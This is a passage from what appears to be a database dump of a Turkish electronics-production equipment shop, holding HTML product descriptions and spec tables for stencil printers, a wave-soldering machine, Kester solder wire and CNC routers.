opsiyonları</li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>&Uuml;r&uuml;n Kodu</td>\r\n<td>\r\n<p>SPR-25</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Doğrusal Baskı Desteği</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Tahrikli Baskı Bı&ccedil;akları</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>&Ccedil;ift Baskı Bı&ccedil;ağı</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ayarlanabilir Baskı A&ccedil;ısı</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ayarlanabilir Baskı Hızı ve G&uuml;c&uuml;</p>\r\n</td>\r\n<td>\r\n<p>Man&uuml;el</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Otomatik &Ccedil;er&ccedil;eve Kaldırma Desteği</p>\r\n</td>\r\n<td>\r\n<p>Man&uuml;el</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>X &amp; Y Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>12.7mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Z Eksen Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>16mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>A&ccedil;ı Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>&Ccedil;ift Noktadan &plusmn;5&deg;</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Baskı Alanı</p>\r\n</td>\r\n<td>\r\n<p>406x457mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum &Ccedil;er&ccedil;eve Boyutu</p>\r\n</td>\r\n<td>\r\n<p>584x584mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>SMTrue G&ouml;r&uuml;nt&uuml; Desteği</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>FoilFrame Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>&Ccedil;ift Y&uuml;zl&uuml; PCB Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Metal Bı&ccedil;ak Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Vakum PCB Tutucu Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>G&uuml;&ccedil; Bağlantısı</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Hava Bağlantısı</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ağırlık</p>\r\n</td>\r\n<td>\r\n<p>~53.1kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Boyutlar</p>\r\n</td>\r\n<td>\r\n<p>711x838x355mm</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','SPR-25','','','','spr-20-41'),(43,'Semi-Automatic Screen Printer','<h2 style=\"text-align: left;\">DDM NOVASTAR - SEMI-AUTOMATIC SCREEN PRINTER</h2>\r\n<p style=\"text-align: left;\">Masa&uuml;st&uuml; Yarı-Otomatik stencil printer</p>\r\n<ul>\r\n<li style=\"text-align: left;\">Ayarlanabilir pn&ouml;matik tahrikli baskı bı&ccedil;akları</li>\r\n<li style=\"text-align: left;\">Baskı a&ccedil;ısı ayarlanabilen &ccedil;iftli baskı bı&ccedil;ağı ile rahat ve temiz kullanım</li>\r\n<li style=\"text-align: left;\">Hassas X,Y,Z ve theta ayar kontrol&uuml; ile y&uuml;ksek tekrar edilebilirlik</li>\r\n<li style=\"text-align: left;\">584x584mm &lsquo;ye kadar &ccedil;er&ccedil;eveler i&ccedil;in boyutları ayarlanabilir</li>\r\n<li style=\"text-align: left;\">Piston destekli kolay &ccedil;er&ccedil;eve kaldırma</li>\r\n<li style=\"text-align: left;\">Vakum PCB tutma, &ccedil;ift taraflı baskı ve FoilFrame opsiyonları</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp; <span style=\"text-decoration: underline;\"><strong>45VA i&ccedil;in</strong></span></p>\r\n<ul>\r\n<li style=\"text-align: left;\">SMTrue g&ouml;r&uuml;nt&uuml; desteği 10 kata kadar g&ouml;r&uuml;nt&uuml;y&uuml; b&uuml;y&uuml;terek PCB ve eleğin tam eşleşmesini garantiler</li>\r\n<li style=\"text-align: left;\">0.30mm (12mil) bacak aralıklı malzemeler i&ccedil;in hizalama sağlar</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>&Uuml;r&uuml;n Kodu</td>\r\n<td>\r\n<p>SPR-45/45VA</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Doğrusal Baskı Desteği</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Tahrikli Baskı Bı&ccedil;akları</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>&Ccedil;ift Baskı Bı&ccedil;ağı</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ayarlanabilir Baskı A&ccedil;ısı</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ayarlanabilir Baskı Hızı ve G&uuml;c&uuml;</p>\r\n</td>\r\n<td>\r\n<p>Pn&ouml;matik</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Otomatik &Ccedil;er&ccedil;eve Kaldırma Desteği</p>\r\n</td>\r\n<td>\r\n<p>Otomatik</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>X &amp; Y Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>12.7mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Z Eksen Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>16mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>A&ccedil;ı Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>&Ccedil;ift Noktadan &plusmn;5&deg;</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Baskı Alanı</p>\r\n</td>\r\n<td>\r\n<p>406x457mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum &Ccedil;er&ccedil;eve Boyutu</p>\r\n</td>\r\n<td>\r\n<p>584x584mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>SMTrue G&ouml;r&uuml;nt&uuml; Desteği</p>\r\n</td>\r\n<td>\r\n<p>Var (SPR-45VA)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>FoilFrame Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>&Ccedil;ift Y&uuml;zl&uuml; PCB Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Metal Bı&ccedil;ak Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Vakum PCB Tutucu Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>G&uuml;&ccedil; Bağlantısı</p>\r\n</td>\r\n<td>\r\n<p>220VAC, 1A</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Hava Bağlantısı</p>\r\n</td>\r\n<td>\r\n<p>5 Bar</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ağırlık</p>\r\n</td>\r\n<td>\r\n<p>~73kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Boyutlar</p>\r\n</td>\r\n<td>\r\n<p>762x90x406mm</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','SPR-45','','','','spr-20-41-42'),(44,'Desktop','<h2 style=\"text-align: left;\">SPARTAN 12S/12D Wave-soldering Machine</h2>\r\n<ul>\r\n<li style=\"text-align: left;\">K&uuml;&ccedil;&uuml;k bir alanda tam otomatik bilgisayar kontroll&uuml; lehimleme sistemi</li>\r\n<li style=\"text-align: left;\">M&uuml;kemmel doğruluk ve tekrar edilebilirlik sağlayan gelişmiş teknoloji</li>\r\n<li style=\"text-align: left;\">Tek veya &ccedil;ift dalga se&ccedil;ilebilir</li>\r\n<li style=\"text-align: left;\">Kurşunlu veya kurşunsuz &uuml;retime uygun se&ccedil;ilebilir</li>\r\n<li style=\"text-align: left;\">Kolay kullanım ve bakım</li>\r\n<li style=\"text-align: left;\">Nitrojen opsiyonu</li>\r\n</ul>\r\n<table border=\"0\" id=\"zebra-blue\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>MODEL ADI</td>\r\n<td>SPARTAN 12S</td>\r\n<td>SPARTAN 12D</td>\r\n</tr>\r\n<tr>\r\n<td>Kontrol Sistemi</td>\r\n<td>Novastar Bilgisayar Sistemi</td>\r\n<td>Novastar Bilgisayar Sistemi</td>\r\n</tr>\r\n<tr>\r\n<td>Dalga Genişliği</td>\r\n<td>300mm</td>\r\n<td>300mm</td>\r\n</tr>\r\n<tr>\r\n<td>Dalga Y&uuml;ksekliği</td>\r\n<td>0-10mm</td>\r\n<td>0-10mm</td>\r\n</tr>\r\n<tr>\r\n<td>Konvey&ouml;r Hızı</td>\r\n<td>2000mm/dakika</td>\r\n<td>2000mm/dakika</td>\r\n</tr>\r\n<tr>\r\n<td>&Ouml;nısıtıcı Maks. Sıc. ve G&uuml;c&uuml;</td>\r\n<td>150&ordm;C / 6.00kW</td>\r\n<td>150&ordm;C / 6.00kW</td>\r\n</tr>\r\n<tr>\r\n<td>Lehim Pota Kapasitesi</td>\r\n<td>90kg</td>\r\n<td>170kg</td>\r\n</tr>\r\n<tr>\r\n<td>Pota Maks. Sıcaklığı</td>\r\n<td>300&ordm;C</td>\r\n<td>300&ordm;C</td>\r\n</tr>\r\n<tr>\r\n<td>Pota Maks. Sıcaklığı (Kurşunsuz)</td>\r\n<td>350&ordm;C</td>\r\n<td>350&ordm;C</td>\r\n</tr>\r\n<tr>\r\n<td>Pota Maksimum G&uuml;c&uuml;</td>\r\n<td>3.6kW</td>\r\n<td>7.2kW</td>\r\n</tr>\r\n<tr>\r\n<td>K&ouml;p&uuml;k Flux Tankı</td>\r\n<td>3 lt</td>\r\n<td>3 lt</td>\r\n</tr>\r\n<tr>\r\n<td>G&uuml;&ccedil; Kaynağı</td>\r\n<td>1 faz - 220VAC&nbsp;</td>\r\n<td>3 faz - 220VAC&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>','Spartan 12S/12D','','','','spartan-12s-12d'),(49,'Sn63Pb37 Solder Wire - 0.6mm','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER LEHİM TELİ</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\"Cored Wire\" ın mucidi olan KESTER, mükemmel flux förmülleri ve kullanığı saf alaşımlarla dünyanın en büyük üreticilerindendir. Uzun yıllara dayanan tecrübesi ve her üretime uygun flux ve alaşım çeşitleriyle tüm ihtiyaçlarınıza uygun çözümler sunar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_tel_formul.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;<img style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\" src=\"images/kester/kester_tel.jpg\" alt=\"\" border=\"0\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"Tel Çapları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>Standart Tel Çapları &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_wire%20diameter.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Flux Oranları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Standart&nbsp;Flux Dolgu Boyutları</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/Kester_Standart%20core%20sizes.png\" alt=\"\" width=\"254\" height=\"160\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','245-Sn63Pb37-0.6mm','','','','245-sn63pb37-0.6mm'),(48,'Sn63Pb37 Solder Wire - 0.4mm','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER LEHİM TELİ</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\"Cored Wire\" ın mucidi olan KESTER, mükemmel flux förmülleri ve kullanığı saf alaşımlarla dünyanın en büyük üreticilerindendir. Uzun yıllara dayanan tecrübesi ve her üretime uygun flux ve alaşım çeşitleriyle tüm ihtiyaçlarınıza uygun çözümler sunar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_tel_formul.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;<img style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\" src=\"images/kester/kester_tel.jpg\" alt=\"\" border=\"0\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"Tel Çapları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>Standart Tel Çapları &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_wire%20diameter.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Flux Oranları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Standart&nbsp;Flux Dolgu Boyutları</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/Kester_Standart%20core%20sizes.png\" alt=\"\" width=\"254\" height=\"160\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','245-Sn63Pb37-0.4mm','','','','245-sn63pb37-0.4mm-29'),(50,'Leadfree Solder Wire - 1mm','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER LEHİM TELİ</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\"Cored Wire\" ın mucidi olan KESTER, mükemmel flux förmülleri ve kullanığı saf alaşımlarla dünyanın en büyük üreticilerindendir. Uzun yıllara dayanan tecrübesi ve her üretime uygun flux ve alaşım çeşitleriyle tüm ihtiyaçlarınıza uygun çözümler sunar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_tel_formul.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;<img style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\" src=\"images/kester/kester_tel.jpg\" alt=\"\" border=\"0\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"Tel Çapları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>Standart Tel Çapları &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_wire%20diameter.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Flux Oranları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Standart&nbsp;Flux Dolgu Boyutları</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/Kester_Standart%20core%20sizes.png\" alt=\"\" width=\"254\" height=\"160\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','275-K100-1mm','','','','275-k100-1mm'),(51,'Economical CNC machine\r\n750x750mm dimensions','<h2>Eko Series CNC</h2>\r\n<ul>\r\n<li style=\"text-align: left;\">Model: 3S-CNC-01-750x750</li>\r\n<li style=\"text-align: left;\">Dimensions: 750x750mm</li>\r\n<li style=\"text-align: left;\">Working are: 550x520x122mm</li>\r\n<li style=\"text-align: left;\">No. of axes: 4 (X,Y1,Y2,Z)</li>\r\n<li style=\"text-align: left;\">Spindle: 1.5kW 220VAC Hava-Soğutmalı (24,000 rpm)</li>\r\n<li style=\"text-align: left;\">Inverter: PI kontrol, RS485, Mono-faze veya Trifaze</li>\r\n<li style=\"text-align: left;\">PC: Raspberry</li>\r\n<li style=\"text-align: left;\">Operating System: Linux</li>\r\n<li style=\"text-align: left;\">Monitor: 17\" LCD Ekran</li>\r\n<li style=\"text-align: left;\">Keyboard, mouse: included</li>\r\n<li style=\"text-align: left;\">Origin: Turkey</li>\r\n<li style=\"text-align: left;\">Manufacturer: 3S Technologies</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<h2>Applications</h2>\r\n<ul>\r\n<li style=\"text-align: left;\">Prototype PCB&nbsp; (tek taraflı / &ccedil;ift taraflı)</li>\r\n<li style=\"text-align: left;\">Wood processing</li>\r\n<li style=\"text-align: left;\">Polycarbon / Acrylic cutting</li>\r\n<li style=\"text-align: left;\">Aluminum processing / drilling</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" style=\"border-collapse: collapse;\" cellspacing=\"0\" cellpadding=\"0\"><colgroup><col span=\"6\" /> </colgroup>\r\n<tbody>\r\n<tr style=\"line-height: 200%; background-color: #d22060; color: #ffffff;\">\r\n<td style=\"text-align: center;\">&nbsp; Model&nbsp; &nbsp;&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; X-Width&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; X-Working Area&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; Y-Width&nbsp;&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; Y-Working Area&nbsp; &nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; Z-Working Height&nbsp;&nbsp;</td>\r\n</tr>\r\n<tr style=\"line-height: 150%;\">\r\n<td style=\"text-align: center;\">750x750</td>\r\n<td style=\"text-align: center;\">750mm</td>\r\n<td style=\"text-align: center;\">550mm</td>\r\n<td style=\"text-align: center;\">750mm</td>\r\n<td style=\"text-align: center;\">520mm</td>\r\n<td style=\"text-align: center;\">122mm</td>\r\n</tr>\r\n<tr style=\"line-height: 150%; background-color: #d07193; color: #ffffff;\">\r\n<td style=\"text-align: center;\">1000x1000</td>\r\n<td style=\"text-align: center;\">1000mm</td>\r\n<td style=\"text-align: center;\">800mm</td>\r\n<td style=\"text-align: center;\">1000mm</td>\r\n<td style=\"text-align: center;\">770mm</td>\r\n<td style=\"text-align: center;\">122mm</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\">1500x1500</td>\r\n<td style=\"text-align: center;\">1500mm</td>\r\n<td style=\"text-align: center;\">1300mm</td>\r\n<td style=\"text-align: center;\">1500mm</td>\r\n<td style=\"text-align: center;\">1270mm</td>\r\n<td style=\"text-align: center;\">122mm</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p>&nbsp;</p>','3S-CNC-01-750x750','','','','3s-cnc-01-750x750'),(52,'Economical CNC machine\r\n750x750mm dimensions','<h2>Eko Series CNC</h2>\r\n<ul>\r\n<li style=\"text-align: left;\">Model: 3S-CNC-01-750x750</li>\r\n<li style=\"text-align: left;\">Dimensions: 750x750mm</li>\r\n<li style=\"text-align: left;\">Working are: 550x520x122mm</li>\r\n<li style=\"text-align: left;\">No. of axes: 4 (X,Y1,Y2,Z)</li>\r\n<li style=\"text-align: left;\">Spindle: 1.5kW 220VAC Hava-Soğutmalı (24,000 rpm)</li>\r\n<li style=\"text-align: left;\">Inverter: PI kontrol, RS485, Mono-faze veya Trifaze</li>\r\n<li style=\"text-align: left;\">PC: Raspberry</li>\r\n<li style=\"text-align: left;\">Operating System: Linux</li>\r\n<li style=\"text-align: left;\">Monitor: 17\" LCD Ekran</li>\r\n<li style=\"text-align: left;\">Keyboard, mouse: included</li>\r\n<li 